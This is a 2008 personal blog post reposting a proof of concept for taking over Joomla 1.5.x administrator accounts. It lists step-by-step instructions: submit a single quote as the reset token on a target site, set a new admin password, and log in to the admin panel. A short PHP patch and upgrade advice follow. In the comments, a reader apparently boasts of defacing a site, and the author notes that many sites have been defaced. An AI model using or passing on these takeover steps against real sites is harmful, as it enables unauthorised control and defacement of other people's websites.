Joomla 1.5.x Remote Admin Password Change | Mr Am's SySteM

Joomla 1.5.x Remote Admin Password Change

August 14th, 2008

####################################################
#### Joomla 1.5.x Remote Admin Password Change ####
####################################################

Bug : http://www.milw0rm.com/exploits/6234
Patch : click here
POC :

1. Go to url : www.target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field “token” char ‘ and Click OK.
3. Write new password for admin
4. Go to url : www.target.com/administrator/
5. Login admin with new password

Upgrade to latest Joomla! version (1.5.6 or newer)

0r

Add the following code to global $mainframe; on line 113 of reset.php

[sourcecode language='php']

if(strlen($token) != 32) {
$this->setError(JText::_(’INVALID_TOKEN’));
return false;

}

[/sourcecode]

Posted by Mr Am on August 14th, 2008 | Filed in Bug, Hacker, Network Security, hacking |

2 Responses to “Joomla 1.5.x Remote Admin Password Change”

August 14th, 2008 at 11:41 am

dean said:

harimaumalaya.com = find = “dean was here”

[Reply]
Mr Am Reply:
August 14th, 2008 at 11:28 pm
cepat ko eh bro..

Tapi bug ni mmg sangat serious bro.. byk dah site kena deface..

[Reply]

Please leave a Comment

IM Online

User Online
- 2 Users Online
- Users: 1 Guest, 1 Bot

Pagerank Checker

Technorati rank Technorati inblogs(authority) Technorati inlinks Technorati last update Google pagerank Alexa popularity Alexa backlink Google backlink Yahoo inlink Google indexed Yahoo indexed MSN indexed AllTheWeb result Altavista result Exactrank Googlebot last access Blogworth Listed in DMOZ or not ?
CLICK HERE

Shout

Plurking!

Pages

Archives

Recent Comments
- ainaa on Happy new year..
- ::junior:: on Hari ni 31st dec..
- june on No programming tutorial here..
- Sweet Thinker on Hari ni 31st dec..
- Sweet Thinker on Happy new year..

Sphere

BLOG Blogger buat duit cari duit code computer crimes act 1997 contest cyberlaw data center derma exam favicon free hosting games hack hacking hacking video hadiah host hosting hosting murah hosting percuma hp hs identities indo kernel ketahuaan. lirik lagu kod rahsia lirik local exploit make money malaysia cyberlaw matta money maker New American Classic peluang percuma webspace secret codes shutdown day Taking Back Sunday Tic Tac Toe Trigonometric website webspace 32bit (1)
64bit (1)
Adidas (1)
Announcement (11)
Award (2)
Bangun! Bangkit! Jaga! (1)
Bengong (3)
bharian (1)
BLOG (30)
Blogger (6)
Blogroll (3)
Bored (2)
Bug (2)
Chinese girl (1)
Cinta (1)
Computer (1)
Contract (1)
current mood! (7)
Domain Name (3)
Electrical (1)
Electromagnet (2)
F**K (9)
Football (2)
Friendship (1)
Friendster (1)
FUCK (9)
Fuck The Fuckin' Fucker (2)
Funny (1)
FW: (2)
games (2)
Hacker (6)
hacking (5)
Handphone (1)
Hardware (1)
Heliza (7)
hmetro (2)
hosting (4)
HTML (3)
I.S.L.A.M (3)
IKLAN (2)
IT (15)
Javascript (1)
Joke (1)
Karya (2)
kesengalan (3)
KFC (6)
linux (4)
Loser (2)
LOVE (14)
Lyric (17)
MAC (1)
Malaysia (4)
Man U (1)
Mathematic (2)
Melayu (1)
Menulis (1)
MERDEKA (1)
My Bro (1)
My Life (79)
My Princess (14)
My Syllabus (22)
MyOnlineHoster (3)
Network Security (8)
News (2)
Operating system (1)
Others (3)
Page Rank (1)
Phone (1)
photographer (1)
Politik (1)
Poll (1)
Programming (3)
Proverb (1)
PSM (7)
Radio (1)
Rantaian (1)
Reviews (1)
SERVER (7)
Software PC (2)
Survey (1)
System (11)
Tagged (8)
Test (1)
The 48 Laws of Power (2)
Tic Tac Toe (1)
tips (2)
Twitter (4)
Typing (1)
Uncategorized (18)
Upin dan Ipin (1)
Video clip (2)
Web application (1)
Welcome (1)
windows (4)
wishing (9)
Wordpress (4)

WP Cumulus Flash tag cloud by Roy Tanck requires Flash Player 9 or better.

Meta

Search: